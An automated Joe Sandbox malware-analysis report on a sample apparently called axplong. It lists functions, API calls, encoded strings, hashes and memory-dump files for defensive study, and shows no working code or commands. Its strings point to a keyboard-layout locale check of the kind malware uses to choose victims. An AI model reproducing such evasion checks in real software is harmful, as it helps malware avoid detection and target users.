Instruction ID: 39ac44483ce556640f5f612605a00bf94db8210d94b452b40149b55f5e9592a2
Opcode Fuzzy Hash: 59122ff5e75c6425006e1677f155552bf63c08e45b65492b494481140f8607ea
Instruction Fuzzy Hash: E72315719002649BEB19DB28ED4579DBBB2DF91308F5481D8E048A72C6EB359FC48FB1

Function 00D15DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

00000423, xrefs: 00D1600A
Keyboard Layout\Preload, xrefs: 00D15F64
0000043f, xrefs: 00D1603B
00000422, xrefs: 00D15FD9
00000419, xrefs: 00D15FA8

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
API String ID: 0-3963862150
Opcode ID: 97e646f04fa79b0992d0f9da899783dd93efa463bcbadfbfd7a37576848f552a
Instruction ID: 3c2248a4db941be616228b8ade74dc61ba7c28f39d08d9f52d98d4e19ba990d1
Opcode Fuzzy Hash: 97e646f04fa79b0992d0f9da899783dd93efa463bcbadfbfd7a37576848f552a
Instruction Fuzzy Hash: 4BE18D71904228AFEB24DF94DC89BDDB7B9EB14304F5042D9E409A7291DB74ABC48F61

Function 00D17D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00D17EA3

Strings

JmpxRL==, xrefs: 00D18062
JmpyPb==, xrefs: 00D1810A
JmpxQb==, xrefs: 00D181B2

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID: JmpxQb==$JmpxRL==$JmpyPb==
API String ID: 1721193555-2057465332
Opcode ID: 0457425d9c51dc32e6f03150d46c830e44e67c4540be26c72c1bf4547614cfcb
Instruction ID: 0a8d2b60532558677bd9470d55ff73df70398546abdbc55d619e668bfb300476
Opcode Fuzzy Hash: 0457425d9c51dc32e6f03150d46c830e44e67c4540be26c72c1bf4547614cfcb
Instruction Fuzzy Hash: 2DD1E870E04614ABDB14EB28ED463DD7671EB82314F544288E455A73D2EF354EC49BF2

Function 00D46E01 Relevance: 4.6, APIs: 3, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNELBASE(?,?,00000000,00000000), ref: 00D46E23
GetFileInformationByHandle.KERNELBASE(?,?), ref: 00D46E7D
__dosmaperr.LIBCMT ref: 00D46F12

Part of subcall function 00D47177: __dosmaperr.LIBCMT ref: 00D471AC

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$HandleInformationType
String ID:
API String ID: 2531987475-0
Opcode ID: 490851a10c51b2b58d7af5c3d55c8ee34b46bda14c360610f412d5c05c2621f9
Instruction ID: 772c9221ff323b262c002f2d2830b7d1daa379bc847f2ed281ea1ff8ab5f23ab
Opcode Fuzzy Hash: 490851a10c51b2b58d7af5c3d55c8ee34b46bda14c360610f412d5c05c2621f9
Instruction Fuzzy Hash: 1D414C75900644ABDB24DFB5E8419AFBBF9EF89300B14452DF996D3211EB30E909CB71

Function 00D182B0 Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE(?), ref: 00D18454

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: db327e34a941dae24672ee4a63bb3fc8c2940480b56cd181550b763212ab8cd0
Instruction ID: 4e8372692b29de0db833e007e09f81a9904c44f8b84e4e1e732971db76979819
Opcode Fuzzy Hash: db327e34a941dae24672ee4a63bb3fc8c2940480b56cd181550b763212ab8cd0
Instruction Fuzzy Hash: 80513970D04218ABEB24EF68ED457EEB776DB45314F504298E818A72D1EF349EC09BB1

Function 00D46C99 Relevance: 1.6, APIs: 1, Instructions: 89
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cac54f4f36c3848d2a8ac401313180c7dc01f8b17b4631d5533cdb6dee32914b
Instruction ID: a202672a992c7f104ee5e4a9bae04dc32fb90188fa41ce2273e2cddc4f0a353c
Opcode Fuzzy Hash: cac54f4f36c3848d2a8ac401313180c7dc01f8b17b4631d5533cdb6dee32914b
Instruction Fuzzy Hash: F421D372A01208ABEB116B649C42BAE3729DF42779F244310F9253B1D1DB70DE0696B2

Function 00D46F71 Relevance: 1.6, APIs: 1, Instructions: 56
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00D46FB3

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: Time$LocalSpecificSystem
String ID:
API String ID: 2574697306-0
Opcode ID: ddcf204bfdd73135336118b0b3849fb3590107b9ad9a40a4c7760d1f210f3fe2
Instruction ID: feb8b64a26b735c478dcb9dd042a8e8a55f5066383c50a66a31a7217fd006e77
Opcode Fuzzy Hash: ddcf204bfdd73135336118b0b3849fb3590107b9ad9a40a4c7760d1f210f3fe2
Instruction Fuzzy Hash: 4811ECB290020CABDB10DE95D941EDFB7BCAF09314F545266E556E6180EB30EB49CB72

Function 00D26AE0 Relevance: 1.3, APIs: 1, Instructions: 40
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00D26B65

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 3440b1850903db564eff2417ecf6fb69fb6818bdec1422487ec7efa3bfa4a512
Instruction ID: ee0f6f602dea61777d3d15c7c952390df76a23c11730ee410f1349a70ff7440a
Opcode Fuzzy Hash: 3440b1850903db564eff2417ecf6fb69fb6818bdec1422487ec7efa3bfa4a512
Instruction Fuzzy Hash: B9F0F471E00614BBC710BB68ED07B5EBB75EB56724F800348E825673E1EB345A048BF2

Function 04F30D7B Relevance: .1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2786865143.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f30000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66bdff31b4c9dbb366849880c181f41bc61020cc657151ec46556b8972683084
Instruction ID: 62b19867910cc8df0bc791678f7105ec371f584c02a426d8a1884c342f2f4110
Opcode Fuzzy Hash: 66bdff31b4c9dbb366849880c181f41bc61020cc657151ec46556b8972683084
Instruction Fuzzy Hash: 78F04FFB34C1157EB10191967F14EFB67ADE1C47313B1C92BF442C5809EA992A8F6532

Function 04F30D84 Relevance: .1, Instructions: 67
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2786865143.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f30000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07183caf8b6beba8f223a63a7e87893bb17a54274a85b4ac3c80d1667dcadbe
Instruction ID: 8aecde8976ae78493652ce5ded3c0a2416877956607300f0749fdaa1c3405c7e
Opcode Fuzzy Hash: a07183caf8b6beba8f223a63a7e87893bb17a54274a85b4ac3c80d1667dcadbe
Instruction Fuzzy Hash: 19F037EB358115BEB10195866F14AFB67ADE2D0731370C92BF442C540AEA992A8A6632

Function 04F30D8D Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2786865143.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f30000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93add4f5d704103a8d88289835ba6931a6d9c2b4e6d703d9562de500c4c4b2d2
Instruction ID: 14f5e967ec1530f73a3fdb8eebd81a63b3c4b4711757ee050c76f806feb2a0f9
Opcode Fuzzy Hash: 93add4f5d704103a8d88289835ba6931a6d9c2b4e6d703d9562de500c4c4b2d2
Instruction Fuzzy Hash: FEF06DFB34C1157EB101A1827F14AFB27ADE2C1731330C82BF442C440AEA992A8F6032

Function 04F30DA2 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2786865143.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f30000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404ba325962792a28c0d5e9d2e85e0b72ce3226aa81bd480c4127563066d929e
Instruction ID: 0dea386a0afef8099cc521a9b5ddefe8b5a95cc577111e35af69c3211403e26b
Opcode Fuzzy Hash: 404ba325962792a28c0d5e9d2e85e0b72ce3226aa81bd480c4127563066d929e
Instruction Fuzzy Hash: 96F090FB34D1157EB10191827F14AFB27ADE2C0331330C82BF842C4806EB981A8F6032

Function 04F30DC4 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2786865143.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_4f30000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dc63796b67b07997d56b4132387eff3d923b63a511167391ab85672cf8e9c5d
Instruction ID: 7733dda0a1b3786428da23653decea320d5759a87c0c7c036db994359f2f71a0
Opcode Fuzzy Hash: 1dc63796b67b07997d56b4132387eff3d923b63a511167391ab85672cf8e9c5d
Instruction Fuzzy Hash: 1CF0E9FB3481157DB201A1956F14EFB676DD1C5731370C83BF802C6845E6950D4A2071

Non-executed Functions

Function 00D1E440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON

Download Yara Rule

Strings

WGt=, xrefs: 00D1F62D, 00D1F90A
WWt=, xrefs: 00D2088D
WWp=, xrefs: 00D204DA
UD==, xrefs: 00D1EA1F, 00D1EC66
#, xrefs: 00D20534
246122658369, xrefs: 00D1F647, 00D1F924, 00D204F7, 00D208AA
fed3aa, xrefs: 00D1FA9E
MT==, xrefs: 00D1E4A5
GqKudSO2, xrefs: 00D1E47F
111, xrefs: 00D1F6B0
MJB+, xrefs: 00D1E734

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: f5dff47abc98291e42d9b218d802b484b81608c9675d573a579ff8ddce20e670
Instruction ID: dbddd67e5738d8053b936f0c38b768f8b3e9be49385becb76b2f60602bb06e3c
Opcode Fuzzy Hash: f5dff47abc98291e42d9b218d802b484b81608c9675d573a579ff8ddce20e670
Instruction Fuzzy Hash: 7982B270904248EBEF14EF68D9497DDBBB6EB55308F508188E805673C2D7759A88CBF2

Function 00D53068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00D531E3

Strings

1#QNAN, xrefs: 00D54381
1#INF, xrefs: 00D5439E
1#SNAN, xrefs: 00D5437A
1#IND, xrefs: 00D54373

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f2b253b0e13ef89eff3dc0f134b9609edd8890d93ff67c322d152c36b2a68b7c
Instruction ID: 254464dc40a59633cdf06cc45d5791f8070a6cf19a409ce20ef124c65ff28bbd
Opcode Fuzzy Hash: f2b253b0e13ef89eff3dc0f134b9609edd8890d93ff67c322d152c36b2a68b7c
Instruction Fuzzy Hash: 33C23A71E046288FDF25CE28DD407AAB7B5EB48346F1441EADC4DE7240E774AE898F61

Function 00D52BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: 65d8fa8e6d5ad99c596faf79347dd73fe061ca6783c2aa9b43f2d897b43711fd
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 64F15E71E002199FDF14CFA9D8806AEB7B1FF49315F15826AEC15A7344D731AE49CBA0

Function 00D2CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00D2CE82,?,?,?,?,00D2CEB7,?,?,?,?,?,?,00D2C42D,?,00000001), ref: 00D2CB33

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783357611.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783489279.0000000000D79000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000D7B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000F00000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000000FE6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.0000000001015000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000101D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2783515636.000000000102B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785046737.000000000102C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785200571.00000000011D0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2785225737.00000000011D2000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_d10000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: f30cf5099b4c480597792f5bc24dc33d582ab351f74be683c0b82f566fc5cf88
Instruction ID: a1bbec8ebbda0caa163122f10ee561df10ce3d2d2be3db6586b3bcb47cf955e4
Opcode Fuzzy Hash: f30cf5099b4c480597792f5bc24dc33d582ab351f74be683c0b82f566fc5cf88
Instruction Fuzzy Hash: 9ED0223251327CD3CE012B90BC048ADBB088F04B183041121E808A3220CBD1AC404BF5

Function 00D47D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00D47EFF

Memory Dump Source

Source File: 00000007.00000002.2783357611.0000000000D11000.00000040.00000001.01000000.00000007.sdmp, Offset: 00D10000, based on PE: true

Associated: 00000007.00000002.2783337288.0000000000D10000.00000004.00000001.01000000.00000007.sdmpDownload File
